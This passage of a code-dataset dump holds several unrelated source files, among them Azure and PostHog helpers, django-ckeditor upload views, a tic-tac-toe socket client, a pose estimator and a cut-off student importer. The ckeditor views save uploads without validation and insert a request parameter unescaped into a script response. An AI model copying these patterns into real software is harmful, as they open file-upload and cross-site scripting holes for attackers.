"selenium.webdriver.common.by.By.ID", "line_number": 13, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 14, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 14, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 15, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 15, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 39, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 45, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 54, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 55, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 59, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 63, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 64, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 68, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 69, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 76, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 79, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 80, "usage_type": "call"}, {"api_name": "common.desired_cadps.desired_conf", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "18071163082", "text": "from msrest.serialization import Model\n\n\nclass AclList(Model):\n \"\"\"A Data Lake Analytics catalog access control list (ACL).\n\n Variables are only populated by the server, and will be ignored when\n sending a request.\n\n :ivar value: the access control list (ACL).\n :vartype value: list[~azure.mgmt.datalake.analytics.catalog.models.Acl]\n \"\"\"\n\n _validation = {\n 'value': {'readonly': True},\n }\n\n _attribute_map = {\n 'value': {'key': 'value', 'type': '[Acl]'},\n }\n\n def __init__(self):\n super(AclList, self).__init__()\n self.value = None\n", "repo_name": "AntObr/credit-to-customer", "sub_path": "env/lib/python2.7/site-packages/azure/mgmt/datalake/analytics/catalog/models/acl_list.py", "file_name": "acl_list.py", "file_ext": "py", "file_size_in_byte": 594, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "msrest.serialization.Model", "line_number": 4, "usage_type": "name"}]} +{"seq_id": "39513327929", "text": "import os\nfrom typing import Any, Callable, List, Optional, Set\n\nfrom django.core.exceptions import ImproperlyConfigured\n\nfrom posthog.utils import str_to_bool\n\n__all__ = [\"get_from_env\", \"get_list\", \"str_to_bool\"]\n\n\ndef get_from_env(\n key: str,\n default: Any = None,\n *,\n optional: bool = False,\n type_cast: Optional[Callable] = None,\n) -> Any:\n value = os.getenv(key)\n if value is None or value == \"\":\n if optional:\n return None\n if default is not None:\n return default\n else:\n raise ImproperlyConfigured(f'The environment variable \"{key}\" is required to run PostHog!')\n if type_cast is not None:\n return type_cast(value)\n return value\n\n\ndef get_list(text: str) -> List[str]:\n if not text:\n return []\n return 
[item.strip() for item in text.split(\",\")]\n\n\ndef get_set(text: str) -> Set[str]:\n if not text:\n return set()\n return {item.strip() for item in text.split(\",\")}\n", "repo_name": "PostHog/posthog", "sub_path": "posthog/settings/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 985, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14422, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.Any", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 16, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 18, "usage_type": "call"}, {"api_name": "django.core.exceptions.ImproperlyConfigured", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "38765849516", "text": "from django.http import HttpResponse\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom . import utils\nfrom . import settings as ck_settings\n\n\n@csrf_exempt\ndef upload(request):\n \"\"\"\n Uploads a file and send back its URL to CKEditor.\n\n TODO:\n Validate uploads\n \"\"\"\n # Get the uploaded file from request.\n upload = request.FILES['upload']\n\n # Open output file in which to store upload.\n upload_filename = utils.get_upload_filename(upload.name, request.user)\n out = open(upload_filename, 'wb+')\n\n # Iterate through chunks and write to destination.\n for chunk in upload.chunks():\n out.write(chunk)\n out.close()\n\n url = utils.create_thumbnail(upload_filename)\n\n # Respond with Javascript sending ckeditor upload url.\n return HttpResponse(\"\"\"\n \"\"\" % (request.GET['CKEditorFuncNum'], url))\n\n\ndef browse(request):\n return render_to_response('browse.html', RequestContext(request, {\n 'images': utils.get_image_browse_urls(request.user),\n }))\n\n\ndef configs(request):\n merged_configs = {}\n if ck_settings.CONFIGS is not None:\n for config_name, config in ck_settings.CONFIGS.iteritems():\n merged_configs[config_name] = utils.validate_config(config_name)\n\n return render_to_response('ckeditor/configs.js', RequestContext(request, {\n 'debug': ck_settings.CKEDITOR_DEBUG,\n 'timestamp': ck_settings.TIMESTAMP,\n 'merged_configs': utils.pretty_json_encode(merged_configs),\n 'jquery_override_val': utils.json_encode(ck_settings.JQUERY_OVERRIDE_VAL),\n }), mimetype=\"application/x-javascript\")\n\n\n@csrf_exempt\ndef fb_upload(request):\n \"\"\"\n A wrapper around django-filebrowser's file upload view. 
It returns a\n javascript function call to CKEDITOR.tools.callFunction(), which\n CKEDITOR expects.\n \"\"\"\n try:\n import filebrowser\n except ImportError:\n raise Exception(\"Filebrowser not installed\")\n\n upload_file_view = None\n\n try:\n from filebrowser.sites import site\n except ImportError:\n pass\n else:\n upload_file_view = site._upload_file\n\n if upload_file_view is None:\n try:\n from filebrowser.views import _upload_file\n except ImportError:\n raise Exception(\n \"django-filebrowser must be version 3.3.0 or greater; \"\n \"currently at version %s\" % filebrowser.VERSION)\n else:\n upload_file_view = _upload_file\n\n # Create a dict on the request object that will be modified by the\n # filebrowser_post_upload signal receiver in ckeditor/models.py\n fb_data = request._fb_data = {}\n\n # Call original view function.\n # Within this function, the filebrowser_post_upload signal will be sent,\n # and our signal receiver will add the filebrowser.base.FileObject\n # instance to request._fb_data[\"upload_file\"]\n upload_file_view(request)\n\n upload_file = fb_data.get('upload_file')\n if not upload_file:\n return HttpResponse(\"Error uploading file\")\n\n return HttpResponse(\"\"\"\n \"\"\" % (request.GET['CKEditorFuncNum'], upload_file.url))\n", "repo_name": "mickael9/django-ckeditor", "sub_path": "ckeditor/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3429, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.http.HttpResponse", "line_number": 33, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 10, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 40, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 40, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 51, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 51, "usage_type": "call"}, {"api_name": "filebrowser.sites.site._upload_file", "line_number": 78, "usage_type": "attribute"}, {"api_name": "filebrowser.sites.site", "line_number": 78, "usage_type": "name"}, {"api_name": "filebrowser.VERSION", "line_number": 86, "usage_type": "attribute"}, {"api_name": "filebrowser.views._upload_file", "line_number": 88, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 102, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 104, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "18028367829", "text": "import threading\r\nimport json\r\nimport socket\r\nimport tkinter as tk\r\nimport config\r\n\r\nip = config.get_ip()\r\n\r\n\r\nclass TicTacToe_client:\r\n def __init__(self, port, name, root):\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.sock.connect((ip, port))\r\n self.sock.send(json.dumps(name).encode('utf-8'))\r\n self.width = 300\r\n self.height = 400\r\n self.btn_list = []\r\n self.root = tk.Toplevel(root)\r\n self.root.geometry(str(self.width) + 'x' + str(self.height))\r\n self.root.title('TicTacToe')\r\n self.root.resizable(False, False)\r\n self.root.protocol(\"WM_DELETE_WINDOW\", self.give_up)\r\n\r\n self.c = tk.Canvas(self.root)\r\n self.c.configure(height=self.height, width=self.width, bg='gray')\r\n self.c.pack()\r\n\r\n def give_up(self):\r\n 
self.sock.send(json.dumps('**||GIVEUP||**').encode('utf-8'))\r\n self.root.destroy()\r\n\r\n\r\n def draw_empty_board(self):\r\n # Creating a 3x3 table\r\n self.c.create_rectangle(0, 0, 300, 100, fill='black')\r\n self.c.create_text(150, 50, text='TicTacToe', font=('Jokerman', 30), fill='white', tags='text')\r\n for i in range(1, 4):\r\n self.c.create_line(0, 100 + i * 100, self.width, 100 + i * 100)\r\n self.c.create_line(i * 100, 100, i * 100, self.height)\r\n\r\n def val_btn(self, num):\r\n row = num // 3\r\n col = num % 3\r\n self.sock.send(json.dumps((row, col)).encode('utf-8'))\r\n\r\n def create_btns(self):\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(0),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(1),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(2),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(3),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(4),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(5),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(6),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(7),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(8),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n\r\n def drawGame(self, game_grid):\r\n self.c.delete('all')\r\n self.draw_empty_board()\r\n\r\n for row in range(3):\r\n for col in range(3):\r\n if game_grid[row][col] == 0:\r\n self.c.create_window(col * 100 + 50, 150 + row * 100, window=self.btn_list[row * 3 + col])\r\n elif game_grid[row][col] == 1:\r\n self.c.create_oval(col * 100 + 20, 120 + row * 100, 80 + col * 100, 180 + row * 100, width=2)\r\n elif game_grid[row][col] == 2:\r\n self.c.create_line(col * 100, 200 + row * 100, 100 + col * 100, 100 + row * 100, width=2,\r\n fill='black')\r\n self.c.create_line(col * 100, 100 + row * 100, 100 + col * 100, 200 + row * 100, width=2,\r\n fill='black')\r\n\r\n def draw_win_line(self, key):\r\n if key[-3:] == '--0':\r\n self.c.delete('text')\r\n self.c.create_text(150, 50, text='DRAW', font=('chiller', 40), fill='white')\r\n return\r\n key = key[4:]\r\n if key[0] == 'R':\r\n self.c.create_line(0, 150 + int(key[1]) * 100, self.width, 150 + int(key[1]) * 100, fill='red', width=4)\r\n elif key[0] == 'C':\r\n self.c.create_line(50 + int(key[1]) * 100, 100, 50 + int(key[1]) * 100, 400, fill='red', width=4)\r\n elif key[0:2] == 'DL':\r\n self.c.create_line(0, 100, 300, 400, fill='red', width=4)\r\n elif key[0:2] == 'DR':\r\n self.c.create_line(0, 400, 300, 100, fill='red', width=4)\r\n self.c.delete('text')\r\n string = key[2:] + ' Wins'\r\n self.c.create_text(150, 50, text=string, font=('chiller', 30), fill='white')\r\n\r\n def shut_down(self):\r\n 
self.root.destroy()\r\n\r\n def play_game(self):\r\n while True:\r\n received = False\r\n while not received:\r\n try:\r\n game_board = json.loads(self.sock.recv(4096).decode('utf-8'))\r\n received = True\r\n except json.decoder.JSONDecodeError:\r\n pass\r\n print(game_board)\r\n if game_board == 'move':\r\n self.c.delete('wait')\r\n self.c.create_text(300, 100, text='YOUR TURN', anchor='se', font=('Times New Roman', 12), fill='cyan', tag='move')\r\n for i in range(9):\r\n self.btn_list[i].configure(state='normal')\r\n elif game_board[:4] == 'OVER':\r\n self.c.delete('move')\r\n self.c.delete('wait')\r\n self.root.protocol(\"WM_DELETE_WINDOW\", self.shut_down)\r\n self.draw_win_line(game_board)\r\n break\r\n else:\r\n for i in range(9):\r\n self.btn_list[i].configure(state='disabled')\r\n self.c.delete('move')\r\n self.c.create_text(300, 100, text='WAIT', anchor='se', font=('Times New Roman', 12), fill='red', tag='wait')\r\n self.drawGame(game_board)\r\n\r\n def run(self):\r\n self.draw_empty_board()\r\n self.create_btns()\r\n self.drawGame([[0, 0, 0], [0, 0, 0], [0, 0, 0]])\r\n\r\n play = threading.Thread(target=self.play_game)\r\n play.start()\r\n\r\n # self.root.mainloop()\r\n", "repo_name": "AR-PyT/Gaming-Platform-with-Integrated-Chat", "sub_path": "tictactoe_client.py", "file_name": "tictactoe_client.py", "file_ext": "py", "file_size_in_byte": 6592, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "config.get_ip", "line_number": 7, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 12, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 12, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 12, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 14, "usage_type": "call"}, {"api_name": "tkinter.Toplevel", "line_number": 18, "usage_type": "call"}, {"api_name": "tkinter.Canvas", "line_number": 24, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 29, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 44, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 47, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 50, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 53, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 56, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 59, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 62, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 65, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 68, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 71, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 117, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 119, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 145, "usage_type": "call"}]} +{"seq_id": "12224587916", "text": "#!/usr/bin/env python\n\n\"\"\"\npose_cpm.py: Convolutional Pose Machines.\nBased on @shihenw code:\nhttps://github.com/shihenw/convolutional-pose-machines-release/blob/master/testing/python/demo.ipynb\n\"\"\"\n__author__ = \"David Pascual Hernandez\"\n__date__ = \"2017/05/22\"\n\nimport math\nimport os\n\n# Avoids verbosity when loading Caffe model\nos.environ[\"GLOG_minloglevel\"] = \"2\"\n\nimport caffe\nimport cv2\nimport numpy as np\n\nfrom pose import PoseEstimator\n\nfrom 
matplotlib import pyplot as plt\n\n\ndef crop_human(sample, c, s, bsize):\n \"\"\"\n Crop human in the image depending on subject center and scale.\n @param sample: np.array - input image\n @param c: list - approx. human center\n @param s: float - approx. human scale wrt 200px\n @param bsize: int - boxsize\n @return: np.array - cropped human\n \"\"\"\n cx, cy = c\n\n # Resize image and center according to given scale\n im_resized = cv2.resize(sample, None, fx=s, fy=s)\n\n h, w, d = im_resized.shape\n\n pad_up = int(bsize / 2 - cy)\n pad_down = int(bsize / 2 - (h - cy))\n pad_left = int(bsize / 2 - cx)\n pad_right = int(bsize / 2 - (w - cx))\n\n # Apply padding or crop image as needed\n if pad_up > 0:\n pad = np.ones((pad_up, w, d), np.uint8) * 128\n im_resized = np.vstack((pad, im_resized))\n else:\n im_resized = im_resized[-pad_up:, :, :]\n h, w, d = im_resized.shape\n\n if pad_down > 0:\n pad = np.ones((pad_down, w, d), np.uint8) * 128\n im_resized = np.vstack((im_resized, pad))\n else:\n im_resized = im_resized[:h + pad_down, :, :]\n h, w, d = im_resized.shape\n\n if pad_left > 0:\n pad = np.ones((h, pad_left, d), np.uint8) * 128\n im_resized = np.hstack((pad, im_resized))\n else:\n im_resized = im_resized[:, -pad_left:, :]\n h, w, d = im_resized.shape\n\n if pad_right > 0:\n pad = np.ones((h, pad_right, d), np.uint8) * 128\n im_resized = np.hstack((im_resized, pad))\n else:\n im_resized = im_resized[:, :w + pad_right, :]\n\n return im_resized\n\n\ndef map_resize(new_shape, heatmap):\n # Resizes the output back to the size of the test image\n scale_y = new_shape[0] / float(heatmap.shape[0])\n scale_x = new_shape[1] / float(heatmap.shape[1])\n map_resized = cv2.resize(heatmap, None, fx=scale_x, fy=scale_y,\n interpolation=cv2.INTER_CUBIC)\n\n return map_resized\n\n\nclass PoseCPM(PoseEstimator):\n def __init__(self, model_fname, boxsize, sigma, confidence_th=0.3):\n \"\"\"\n Constructs Estimator class.\n @param model_fname: Caffe models\n @param weights: Caffe models weights\n \"\"\"\n PoseEstimator.__init__(self, model_fname, boxsize, confidence_th)\n self.model, self.weights = self.model_fname\n self.sigma = sigma\n self.gauss_map = self.gen_gaussmap()\n\n def init_net(self):\n caffe.set_mode_gpu()\n self.net = caffe.Net(self.model, self.weights, caffe.TEST)\n\n def estimate(self):\n \"\"\"\n Estimates human pose.\n @param im: np.array - input image\n @param gaussmap: np.array - Gaussian map\n @return: np.array: articulations coordinates\n \"\"\"\n if not self.net:\n self.init_net()\n\n # Adds gaussian map channel to the input\n input_4ch = np.ones((self.im.shape[0], self.im.shape[1], 4))\n input_4ch[:, :, 0:3] = self.im / 256.0 - 0.5 # normalize to [-0.5, 0.5]\n input_4ch[:, :, 3] = self.gauss_map\n\n # Adapts input to the net\n input_adapted = np.transpose(np.float32(input_4ch[:, :, :, np.newaxis]),\n (3, 2, 0, 1))\n self.net.blobs['data'].reshape(*input_adapted.shape)\n self.net.blobs['data'].data[...] 
= input_adapted\n\n # Estimates the pose\n output_blobs = self.net.forward()\n pose_map = np.squeeze(self.net.blobs[output_blobs.keys()[0]].data)\n\n return pose_map\n\n def gen_gaussmap(self):\n \"\"\"\n Generates a grayscale image with a centered Gaussian\n @param sigma: float - Gaussian sigma\n @return: np.array - Gaussian map\n \"\"\"\n gaussmap = np.zeros((self.boxsize, self.boxsize, 1))\n for x in range(self.boxsize):\n for y in range(self.boxsize):\n dist_sq = (x - self.boxsize / 2) * (x - self.boxsize / 2) \\\n + (y - self.boxsize / 2) * (y - self.boxsize / 2)\n exponent = dist_sq / 2.0 / self.sigma / self.sigma\n gaussmap[y, x, :] = math.exp(-exponent)\n\n return np.squeeze(gaussmap)\n\n def get_coords(self, sample, human_bbox, get_pose_maps=False):\n \"\"\"\n Estimate human pose given an input image.\n @param sample: np.array - original input image\n @param human: np.array - cropped human image\n @param config: dict - CPM settings\n @param model: pose estimator object\n @param c: np.array - human center\n @param s: int - human scale\n @param viz: bool - flag for joint visualization\n @return: np.array - joint coords\n \"\"\"\n caffe.set_mode_gpu()\n\n (ux, uy), (lx, ly) = human_bbox\n\n # # Get scale\n # scale = float(self.boxsize) / (np.max([np.abs(ux - lx), np.abs(uy - ly)]) + 50)\n #\n # # Get center\n # cx, cy = (int((ux + lx) * scale / 2), int((uy + ly) * scale / 2))\n #\n # im_human = crop_human(sample, (cx, cy), scale, self.boxsize)\n # # plt.figure(), plt.imshow(im_human), plt.show()\n\n # Get scale\n scale = float(self.boxsize) / sample.shape[0]\n # Get center\n cx, cy = (int((ux + lx) * scale / 2), int((uy + ly) * scale / 2))\n im_human = crop_human(sample, (cx, cy), scale, self.boxsize)\n # plt.figure(), plt.imshow(im_human), plt.show()\n\n self.im = im_human.copy()\n\n pose_map = self.estimate()\n\n joint_coords = []\n for joint_map in pose_map:\n joint_map_resized = map_resize(self.im.shape, joint_map)\n\n # Find joint heatmap maxima\n joint = [-1, -1]\n if joint_map_resized.max() >= self.confidence_th:\n joint = list(np.unravel_index(joint_map_resized.argmax(),\n joint_map_resized.shape))\n\n # Back to full coordinates\n joint[0] = (joint[0] - (self.boxsize / 2) + cy) / scale\n joint[1] = (joint[1] - (self.boxsize / 2) + cx) / scale\n\n joint_coords.append(joint)\n\n joint_coords = np.array([[int(x), int(y)] for y, x in joint_coords])\n\n if get_pose_maps:\n return joint_coords, pose_map\n else:\n return joint_coords\n\n\nif __name__ == \"__main__\":\n model_fname = [\"/home/dpascualhe/repos/2017-tfm-david-pascual/src/Estimator/Pose/models/caffe/pose_deploy_resize.prototxt\",\n \"/home/dpascualhe/repos/2017-tfm-david-pascual/src/Estimator/Pose/models/caffe/pose_iter_320000.caffemodel\"]\n sigma = 21\n\n boxsizes = [384, 192, 128, 92]\n\n from matplotlib import pyplot as plt\n plt.figure()\n\n for idx, boxsize in enumerate(boxsizes):\n pe = PoseCPM(model_fname, boxsize, sigma)\n\n im = cv2.imread(\"/home/dpascualhe/repos/2017-tfm-david-pascual/src/Estimator/Samples/nadal.png\")\n bbox = np.array([[237, -21], [597, 338]])\n joints, pose_maps = pe.get_coords(im, bbox, get_pose_maps=True)\n print(pose_maps.shape)\n\n # plt.figure()\n # plt.subplot(441), plt.imshow(pe.im[:, :, ::-1])\n # for idx in range(pose_maps.shape[0]):\n # plt.subplot(4, 4, idx + 2), plt.imshow(pose_maps[idx])\n # plt.show()\n\n limbs = [1, 2, 3, 4, 4, 5, 6, 7, 7, 8, 9, 10, 10, 11, 12, 13, 13, 14]\n limbs = np.array(limbs).reshape((-1, 2)) - 1\n\n colors = [[0, 0, 255], [0, 170, 255], [0, 255, 
170], [0, 255, 0],\n [170, 255, 0], [255, 170, 0], [255, 0, 0], [255, 0, 170],\n [170, 0, 255]]\n\n\n def draw_estimation(im, bbox, joints, limbs, colors, stickwidth=6):\n upper, lower = bbox\n cv2.rectangle(im, tuple(upper), tuple(lower), (0, 255, 0), 3)\n\n for i, (p, q) in enumerate(limbs):\n px, py = joints[p]\n qx, qy = joints[q]\n\n if px >= 0 and py >= 0 and qx >= 0 and qy >= 0:\n m_x = int(np.mean(np.array([px, qx])))\n m_y = int(np.mean(np.array([py, qy])))\n\n length = ((px - qx) ** 2. + (py - qy) ** 2.) ** 0.5\n angle = math.degrees(math.atan2(py - qy, px - qx))\n polygon = cv2.ellipse2Poly((m_x, m_y),\n (int(length / 2), stickwidth),\n int(angle), 0, 360, 1)\n cv2.fillConvexPoly(im, polygon, colors[i])\n\n if px >= 0 and py >= 0:\n cv2.circle(im, (px, py), 3, (0, 0, 0), -1)\n if qx >= 0 and qy >= 0:\n cv2.circle(im, (qx, qy), 3, (0, 0, 0), -1)\n\n return im\n\n im_drawn = draw_estimation(im, bbox, joints, limbs, colors)\n plt.subplot(2, 2, idx + 1), plt.title(\"Boxsize = %dpx\" % boxsize), plt.imshow(im_drawn[:, :, ::-1])\n plt.show()\n\n", "repo_name": "RoboticsLabURJC/2017-tfm-david-pascual", "sub_path": "src/Estimator/Pose/pose_cpm.py", "file_name": "pose_cpm.py", "file_ext": "py", "file_size_in_byte": 9334, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 71, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.INTER_CUBIC", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pose.PoseEstimator", "line_number": 88, "usage_type": "name"}, {"api_name": "pose.PoseEstimator.__init__", "line_number": 95, "usage_type": "call"}, {"api_name": "pose.PoseEstimator", "line_number": 95, "usage_type": "name"}, {"api_name": "caffe.set_mode_gpu", "line_number": 101, "usage_type": "call"}, {"api_name": "caffe.Net", "line_number": 102, "usage_type": "call"}, {"api_name": "caffe.TEST", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 120, "usage_type": "attribute"}, {"api_name": "numpy.squeeze", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 137, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 145, "usage_type": "call"}, 
{"api_name": "caffe.set_mode_gpu", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 232, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 249, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 252, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 252, "usage_type": "call"}, {"api_name": "cv2.ellipse2Poly", "line_number": 253, "usage_type": "call"}, {"api_name": "cv2.fillConvexPoly", "line_number": 256, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 259, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 267, "usage_type": "name"}]} +{"seq_id": "23137312673", "text": "import logging\nimport string\nfrom datetime import datetime\nimport random\n\nimport pandas as pd\nfrom django.contrib.auth import get_user_model\nfrom django.utils.text import slugify\n\nfrom rest_framework import permissions\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom members.models import PersonalProfile\nfrom students.models import Student\nfrom students.serializers import StudentSerializer\n\nUser = get_user_model()\n\n\ndef generate_random_password():\n chars = string.ascii_letters + string.digits + string.punctuation\n return ''.join((random.choice(chars)) for x in range(20))\n\n\ndef process_students_data_file(full_file_path):\n logging.info(msg='Reading inputs')\n student_data = pd.read_csv(full_file_path)\n for row_index in student_data.index:\n reg_no = student_data['reg_no'][row_index]\n birth_date = student_data['birth_date'][row_index]\n birth_date = datetime.strptime(birth_date, '%d/%m/%Y').date()\n first_name = student_data['first_name'][row_index]\n middle_name = student_data['middle_name'][row_index]\n last_name = student_data['last_name'][row_index]\n degree = student_data['degree'][row_index]\n department = student_data['department'][row_index]\n reg_year = int(student_data['reg_year'][row_index])\n pass_year = int(student_data['grad_year'][row_index])\n gender = student_data['gender'][row_index]\n email = student_data['email'][row_index]\n email = str(email).lower().replace(' ', '')\n contact = 
